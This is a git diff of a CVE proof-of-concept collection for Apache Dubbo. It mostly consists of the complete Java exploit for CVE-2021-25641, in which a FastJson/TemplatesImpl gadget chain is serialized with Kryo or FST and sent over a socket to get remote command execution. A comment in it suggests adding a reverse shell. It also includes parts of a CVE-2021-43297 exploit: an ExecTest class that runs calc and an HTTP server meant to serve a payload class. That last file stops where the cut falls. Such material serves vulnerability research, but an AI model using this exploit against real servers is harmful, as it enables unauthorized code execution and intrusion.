DubboProtocolExploit; - - -import com.alibaba.fastjson.JSONObject; -import org.apache.dubbo.common.io.Bytes; -import org.apache.dubbo.common.serialize.Serialization; -import org.apache.dubbo.common.serialize.fst.FstObjectOutput; -import org.apache.dubbo.common.serialize.fst.FstSerialization; -import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput; -import org.apache.dubbo.common.serialize.kryo.KryoSerialization; -import org.apache.dubbo.common.serialize.ObjectOutput; -import org.apache.dubbo.rpc.RpcInvocation; -import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput; -import org.apache.dubbo.serialize.hessian.Hessian2Serialization; -/*import com.alibaba.dubbo.common.io.Bytes; -import com.alibaba.dubbo.common.serialize.Serialization; -import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput; -import com.alibaba.dubbo.common.serialize.fst.FstSerialization; -import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput; -import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization; -import com.alibaba.dubbo.common.serialize.ObjectOutput;*/ - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.OutputStream; -import java.io.Serializable; -import java.lang.reflect.Method; -import java.net.Socket; - -/* This Dubbo protocol exploit affects versions <= 2.7.3, - and will print "whoops!" on the server's console via RCE. - - This issue is caused by deserialization of untrusted data, - triggered via a communication protocol that allows dynamically - switching to a vulnerable deserializer, and exploited with a - payload gadget chain based on FastJson - - On Windows servers - it will try to execute calc.exe - On Linux servers - it will touch /tmp/dubboexploited - */ - -public class Main { - // Customize URL for remote targets - public static String DUBBO_HOST_NAME = "localhost"; - public static int DUBBO_HOST_PORT = 20880; - - // OS-specific payloads - comment to switch OS variants - // exploit will print "whoops!" on server console either way - //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux - public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows - - //Exploit variant - comment to switch exploit variants - public static String EXPLOIT_VARIANT = "Kryo"; - //public static String EXPLOIT_VARIANT = "FST"; - - // Magic header from ExchangeCodec - protected static final short MAGIC = (short) 0xdabb; - protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0]; - protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1]; - - // Message flags from ExchangeCodec - protected static final byte FLAG_REQUEST = (byte) 0x80; - protected static final byte FLAG_TWOWAY = (byte) 0x40; - - public static void main(String[] args) throws Exception { - Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND); // TemplatesImpl gadget chain - - // triggers Runtime.exec() on TemplatesImpl.newTransformer() - JSONObject jo = new JSONObject(); - jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper - Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger - - // encode request data. - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - - // Kryo exploit variant - Serialization s; - ObjectOutput objectOutput; - switch(EXPLOIT_VARIANT) { - case "FST": - s = new FstSerialization(); - objectOutput = new FstObjectOutput(bos); - break; - case "Kryo": - default: - s = new KryoSerialization(); - objectOutput = new KryoObjectOutput(bos); - break; - } - - // 0xc2 is Hessian2 + two-way + Request serialization - // Kryo | two-way | Request is 0xc8 on third byte - // FST | two-way | Request is 0xc9 on third byte - - byte requestFlags = (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY); - byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs - bos.write(header); - // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too - /* - objectOutput.writeUTF("notAversion"); - objectOutput.writeUTF("notAservice"); - objectOutput.writeUTF("notAserviceVersion"); - objectOutput.writeUTF("notAmethod"); - objectOutput.writeUTF("notAtype"); //*/ - - // This section contains valid data writes - RpcInvocation ri = new RpcInvocation(); - ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class}); - //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;"); - ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}}); - // Strings need only satisfy "readUTF" calls until "readObject" is reached - - // /* - objectOutput.writeUTF("2.0.2"); - objectOutput.writeUTF("org.apache.dubbo.demo.DemoService"); - objectOutput.writeUTF("0.0.0"); - objectOutput.writeUTF("sayHello"); - objectOutput.writeUTF("Ljava/lang/String;"); //*/ - - objectOutput.writeObject(gadgetChain); - objectOutput.writeObject(ri.getAttachments()); - - objectOutput.flushBuffer(); - byte[] payload = bos.toByteArray(); - int len = payload.length - header.length; - Bytes.int2bytes(len, payload, 12); - - // Dubbo Message Stream Hex Dump - for (int i = 0; i < payload.length; i++) { - System.out.print(String.format("%02X", payload[i]) + " "); - if ((i + 1) % 8 == 0) - System.out.print(" "); - if ((i + 1) % 16 == 0 ) - System.out.println(); - - } - // Payload string - System.out.println(); - System.out.println(new String(payload)); - - Socket pingSocket = null; - OutputStream out = null; - // Send request over TCP socket - try { - pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT); - out = pingSocket.getOutputStream(); - } catch (IOException e) { - return; - } - out.write(payload); - out.flush(); - out.close(); - pingSocket.close(); - System.out.println("Sent!"); - } -} +package DubboProtocolExploit; + + +import com.alibaba.fastjson.JSONObject; +import org.apache.dubbo.common.io.Bytes; +import org.apache.dubbo.common.serialize.Serialization; +import org.apache.dubbo.common.serialize.fst.FstObjectOutput; +import org.apache.dubbo.common.serialize.fst.FstSerialization; +import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput; +import org.apache.dubbo.common.serialize.kryo.KryoSerialization; +import org.apache.dubbo.common.serialize.ObjectOutput; +import org.apache.dubbo.rpc.RpcInvocation; +import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput; +import org.apache.dubbo.serialize.hessian.Hessian2Serialization; +/*import com.alibaba.dubbo.common.io.Bytes; +import com.alibaba.dubbo.common.serialize.Serialization; +import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput; +import com.alibaba.dubbo.common.serialize.fst.FstSerialization; +import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput; +import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization; +import com.alibaba.dubbo.common.serialize.ObjectOutput;*/ + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.OutputStream; +import java.io.Serializable; +import java.lang.reflect.Method; +import java.net.Socket; + +/* This Dubbo protocol exploit affects versions <= 2.7.3, + and will print "whoops!" on the server's console via RCE. + + This issue is caused by deserialization of untrusted data, + triggered via a communication protocol that allows dynamically + switching to a vulnerable deserializer, and exploited with a + payload gadget chain based on FastJson + + On Windows servers - it will try to execute calc.exe + On Linux servers - it will touch /tmp/dubboexploited + */ + +public class Main { + // Customize URL for remote targets + public static String DUBBO_HOST_NAME = "localhost"; + public static int DUBBO_HOST_PORT = 20880; + + // OS-specific payloads - comment to switch OS variants + // exploit will print "whoops!" on server console either way + //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux + public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows + + //Exploit variant - comment to switch exploit variants + public static String EXPLOIT_VARIANT = "Kryo"; + //public static String EXPLOIT_VARIANT = "FST"; + + // Magic header from ExchangeCodec + protected static final short MAGIC = (short) 0xdabb; + protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0]; + protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1]; + + // Message flags from ExchangeCodec + protected static final byte FLAG_REQUEST = (byte) 0x80; + protected static final byte FLAG_TWOWAY = (byte) 0x40; + + public static void main(String[] args) throws Exception { + Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND); // TemplatesImpl gadget chain + + // triggers Runtime.exec() on TemplatesImpl.newTransformer() + JSONObject jo = new JSONObject(); + jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper + Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger + + // encode request data. + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + + // Kryo exploit variant + Serialization s; + ObjectOutput objectOutput; + switch(EXPLOIT_VARIANT) { + case "FST": + s = new FstSerialization(); + objectOutput = new FstObjectOutput(bos); + break; + case "Kryo": + default: + s = new KryoSerialization(); + objectOutput = new KryoObjectOutput(bos); + break; + } + + // 0xc2 is Hessian2 + two-way + Request serialization + // Kryo | two-way | Request is 0xc8 on third byte + // FST | two-way | Request is 0xc9 on third byte + + byte requestFlags = (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY); + byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs + bos.write(header); + // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too + /* + objectOutput.writeUTF("notAversion"); + objectOutput.writeUTF("notAservice"); + objectOutput.writeUTF("notAserviceVersion"); + objectOutput.writeUTF("notAmethod"); + objectOutput.writeUTF("notAtype"); //*/ + + // This section contains valid data writes + RpcInvocation ri = new RpcInvocation(); + ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class}); + //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;"); + ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}}); + // Strings need only satisfy "readUTF" calls until "readObject" is reached + + // /* + objectOutput.writeUTF("2.0.2"); + objectOutput.writeUTF("org.apache.dubbo.demo.DemoService"); + objectOutput.writeUTF("0.0.0"); + objectOutput.writeUTF("sayHello"); + objectOutput.writeUTF("Ljava/lang/String;"); //*/ + + objectOutput.writeObject(gadgetChain); + objectOutput.writeObject(ri.getAttachments()); + + objectOutput.flushBuffer(); + byte[] payload = bos.toByteArray(); + int len = payload.length - header.length; + Bytes.int2bytes(len, payload, 12); + + // Dubbo Message Stream Hex Dump + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + + } + // Payload string + System.out.println(); + System.out.println(new String(payload)); + + Socket pingSocket = null; + OutputStream out = null; + // Send request over TCP socket + try { + pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT); + out = pingSocket.getOutputStream(); + } catch (IOException e) { + return; + } + out.write(payload); + out.flush(); + out.close(); + pingSocket.close(); + System.out.println("Sent!"); + } +} diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java index 8aaf5e6c5e316999baabf4d0da8d9b132a8730fa..e69a8a05cd3f6e044193ace14e9fe8fdf8d49d1f 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java @@ -1,221 +1,221 @@ -package DubboProtocolExploit; - -import com.nqzero.permit.Permit; -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; -import com.sun.org.apache.xpath.internal.objects.XString; -import javassist.ClassClassPath; -import javassist.ClassPool; -import javassist.CtClass; -import org.springframework.aop.target.HotSwappableTargetSource; -import sun.reflect.ReflectionFactory; - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.InputStream; -import java.io.Serializable; -import java.lang.reflect.*; -import java.util.HashMap; -import java.util.Map; - -import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; - -/* - * Utility class - based on code found in ysoserial, includes method calls used in - * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were - * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. - * - * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger - * to create a toString trigger - * - * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial - * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec - */ -public class Utils { - static { - // special case for using TemplatesImpl gadgets with a SecurityManager enabled - System.setProperty(DESERIALIZE_TRANSLET, "true"); - - // for RMI remote loading - System.setProperty("java.rmi.server.useCodebaseOnly", "false"); - } - - public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; - - public static class StubTransletPayload extends AbstractTranslet implements Serializable { - - private static final long serialVersionUID = -5971610431559700674L; - - - public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} - - - @Override - public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} - } - - // required to make TemplatesImpl happy - public static class Foo implements Serializable { - - private static final long serialVersionUID = 8207363842866235160L; - } - - public static InvocationHandler createMemoizedInvocationHandler (final Map map ) throws Exception { - return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); - } - - public static Object createTemplatesImpl ( final String command ) throws Exception { - if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { - return createTemplatesImpl( - command, - Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), - Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), - Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); - } - - return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); - } - - - public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) - throws Exception { - final T templates = tplClass.newInstance(); - - // use template gadget class - ClassPool pool = ClassPool.getDefault(); - pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); - pool.insertClassPath(new ClassClassPath(abstTranslet)); - final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); - // run command in static initializer - // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections - String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" + - command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + - "\");"; - clazz.makeClassInitializer().insertAfter(cmd); - // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) - clazz.setName("ysoserial.Pwner" + System.nanoTime()); - CtClass superC = pool.get(abstTranslet.getName()); - clazz.setSuperclass(superC); - - final byte[] classBytes = clazz.toBytecode(); - - // inject class bytes into instance - Utils.setFieldValue(templates, "_bytecodes", new byte[][] { - classBytes, Utils.classAsBytes(Utils.Foo.class) - }); - - // required to make TemplatesImpl happy - Utils.setFieldValue(templates, "_name", "Pwnr"); - Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); - return templates; - } - - public static void setAccessible(AccessibleObject member) { - // quiet runtime warnings from JDK9+ - Permit.setAccessible(member); - } - - public static Field getField(final Class clazz, final String fieldName) { - Field field = null; - try { - field = clazz.getDeclaredField(fieldName); - setAccessible(field); - } - catch (NoSuchFieldException ex) { - if (clazz.getSuperclass() != null) - field = getField(clazz.getSuperclass(), fieldName); - } - return field; - } - - public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { - final Field field = getField(obj.getClass(), fieldName); - field.set(obj, value); - } - - public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { - final Field field = getField(obj.getClass(), fieldName); - return field.get(obj); - } - - public static Constructor getFirstCtor(final String name) throws Exception { - final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; - setAccessible(ctor); - return ctor; - } - - @SuppressWarnings ( {"unchecked"} ) - public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) - throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); - setAccessible(objCons); - Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); - setAccessible(sc); - return (T)sc.newInstance(consArgs); - } - - public static String classAsFile(final Class clazz) { - return classAsFile(clazz, true); - } - - public static String classAsFile(final Class clazz, boolean suffix) { - String str; - if (clazz.getEnclosingClass() == null) { - str = clazz.getName().replace(".", "/"); - } else { - str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); - } - if (suffix) { - str += ".class"; - } - return str; - } - - public static byte[] classAsBytes(final Class clazz) { - try { - final byte[] buffer = new byte[1024]; - final String file = classAsFile(clazz); - final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); - if (in == null) { - throw new IOException("couldn't find '" + file + "'"); - } - final ByteArrayOutputStream out = new ByteArrayOutputStream(); - int len; - while ((len = in.read(buffer)) != -1) { - out.write(buffer, 0, len); - } - return out.toByteArray(); - } catch (IOException e) { - throw new RuntimeException(e); - } - } - public static HashMap makeMap (Object v1, Object v2 ) throws Exception { - HashMap s = new HashMap<>(); - Utils.setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - Utils.setFieldValue(s, "table", tbl); - return s; - } - - public static Object makeXStringToStringTrigger(Object o) throws Exception { - XString x = new XString("HEYO"); - return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); - } +package DubboProtocolExploit; + +import com.nqzero.permit.Permit; +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import com.sun.org.apache.xpath.internal.objects.XString; +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; +import org.springframework.aop.target.HotSwappableTargetSource; +import sun.reflect.ReflectionFactory; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.Serializable; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Map; + +import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; + +/* + * Utility class - based on code found in ysoserial, includes method calls used in + * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were + * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. + * + * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger + * to create a toString trigger + * + * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial + * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec + */ +public class Utils { + static { + // special case for using TemplatesImpl gadgets with a SecurityManager enabled + System.setProperty(DESERIALIZE_TRANSLET, "true"); + + // for RMI remote loading + System.setProperty("java.rmi.server.useCodebaseOnly", "false"); + } + + public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; + + public static class StubTransletPayload extends AbstractTranslet implements Serializable { + + private static final long serialVersionUID = -5971610431559700674L; + + + public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} + + + @Override + public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} + } + + // required to make TemplatesImpl happy + public static class Foo implements Serializable { + + private static final long serialVersionUID = 8207363842866235160L; + } + + public static InvocationHandler createMemoizedInvocationHandler (final Map map ) throws Exception { + return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); + } + + public static Object createTemplatesImpl ( final String command ) throws Exception { + if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { + return createTemplatesImpl( + command, + Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), + Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), + Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); + } + + return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); + } + + + public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) + throws Exception { + final T templates = tplClass.newInstance(); + + // use template gadget class + ClassPool pool = ClassPool.getDefault(); + pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); + pool.insertClassPath(new ClassClassPath(abstTranslet)); + final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); + // run command in static initializer + // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections + String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" + + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + + "\");"; + clazz.makeClassInitializer().insertAfter(cmd); + // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) + clazz.setName("ysoserial.Pwner" + System.nanoTime()); + CtClass superC = pool.get(abstTranslet.getName()); + clazz.setSuperclass(superC); + + final byte[] classBytes = clazz.toBytecode(); + + // inject class bytes into instance + Utils.setFieldValue(templates, "_bytecodes", new byte[][] { + classBytes, Utils.classAsBytes(Utils.Foo.class) + }); + + // required to make TemplatesImpl happy + Utils.setFieldValue(templates, "_name", "Pwnr"); + Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); + return templates; + } + + public static void setAccessible(AccessibleObject member) { + // quiet runtime warnings from JDK9+ + Permit.setAccessible(member); + } + + public static Field getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + + public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + return field.get(obj); + } + + public static Constructor getFirstCtor(final String name) throws Exception { + final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; + setAccessible(ctor); + return ctor; + } + + @SuppressWarnings ( {"unchecked"} ) + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + + public static String classAsFile(final Class clazz) { + return classAsFile(clazz, true); + } + + public static String classAsFile(final Class clazz, boolean suffix) { + String str; + if (clazz.getEnclosingClass() == null) { + str = clazz.getName().replace(".", "/"); + } else { + str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); + } + if (suffix) { + str += ".class"; + } + return str; + } + + public static byte[] classAsBytes(final Class clazz) { + try { + final byte[] buffer = new byte[1024]; + final String file = classAsFile(clazz); + final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); + if (in == null) { + throw new IOException("couldn't find '" + file + "'"); + } + final ByteArrayOutputStream out = new ByteArrayOutputStream(); + int len; + while ((len = in.read(buffer)) != -1) { + out.write(buffer, 0, len); + } + return out.toByteArray(); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + public static HashMap makeMap (Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + Utils.setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + Utils.setFieldValue(s, "table", tbl); + return s; + } + + public static Object makeXStringToStringTrigger(Object o) throws Exception { + XString x = new XString("HEYO"); + return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java index f8b4fc2f419f6c97f4e4623e2d14c4976b5a929e..c4065966441b9045955fbbde378a86d92b3b1cf1 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java @@ -1,5 +1,5 @@ -package org.apache.dubbo.demo; - -public interface DemoService { - public Object sayHello(Object o); -} +package org.apache.dubbo.demo; + +public interface DemoService { + public Object sayHello(Object o); +} diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java index 9651b3ac3e070f7ea445d4020b2e80f72c88b986..38ac7094443c8fee451ee4aeb5c3f78c42797134 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java @@ -1,7 +1,7 @@ -import java.io.IOException; -public class ExecTest { - public ExecTest() throws IOException { - new java.io.IOException().printStackTrace(); - java.lang.Runtime.getRuntime().exec("calc"); - } -} +import java.io.IOException; +public class ExecTest { + public ExecTest() throws IOException { + new java.io.IOException().printStackTrace(); + java.lang.Runtime.getRuntime().exec("calc"); + } +} diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java index 167cbaef032374d0d39cf3e224cd2c6c97013066..e65ac5e8ea9acddb3c8e22ca2b847adc18092458 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java @@ -1,107 +1,107 @@ -import com.google.common.io.Files; -import com.sun.net.httpserver.Headers; -import com.sun.net.httpserver.HttpExchange; -import com.sun.net.httpserver.HttpHandler; -import com.sun.net.httpserver.HttpServer; -import com.sun.net.httpserver.spi.HttpServerProvider; -import java.io.BufferedReader; -import java.io.File; -import java.io.IOException; -import java.io.InputStreamReader; -import java.io.OutputStream; -import java.net.InetSocketAddress; -import java.util.Iterator; -import java.util.List; -import java.util.Set; -import org.apache.commons.lang3.StringUtils; - -/** - * 解析http协议,输出http请求体 - * - * @author xuanyh - */ -public class HTTPServer { - - public static String filePath; - public static int PORT = 8080; - public static String contentType; - - public static void main(String[] args) throws IOException { - run(args); - } - - public static void run(String[] args) { - int port = PORT; - String context = "/"; - String clazz = "Calc.class"; - if (args != null && args.length > 0) { - port = Integer.parseInt(args[0]); - context = args[1]; - clazz = args[2]; - } - HttpServerProvider provider = HttpServerProvider.provider(); - HttpServer httpserver = null; - try { - httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); - } catch (IOException e) { - e.printStackTrace(); - } - //监听端口8080, - - httpserver.createContext(context, new RestGetHandler(clazz)); - httpserver.setExecutor(null); - httpserver.start(); - System.out.println("server started"); - } - - static class RestGetHandler implements HttpHandler { - - private String clazz; - - public RestGetHandler(String clazz) { - this.clazz = clazz; - } - - @Override - public void handle(HttpExchange he) throws IOException { - String requestMethod = he.getRequestMethod(); - System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( - StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" - : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); - if (requestMethod.equalsIgnoreCase("GET")) { - Headers responseHeaders = he.getResponseHeaders(); - responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); - - he.sendResponseHeaders(200, 0); - // parse request - OutputStream responseBody = he.getResponseBody(); - Headers requestHeaders = he.getRequestHeaders(); - Set keySet = requestHeaders.keySet(); - Iterator iter = keySet.iterator(); - - while (iter.hasNext()) { - String key = iter.next(); - List values = requestHeaders.get(key); - String s = key + ": " + values.toString(); - System.out.println(s); - } - System.out.println(); - BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); - StringBuilder stringBuilder = new StringBuilder(); - String line; - for (;(line = bufferedReader.readLine()) != null;) { - stringBuilder.append(line); - } - System.out.println(stringBuilder.toString()); - -// byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : 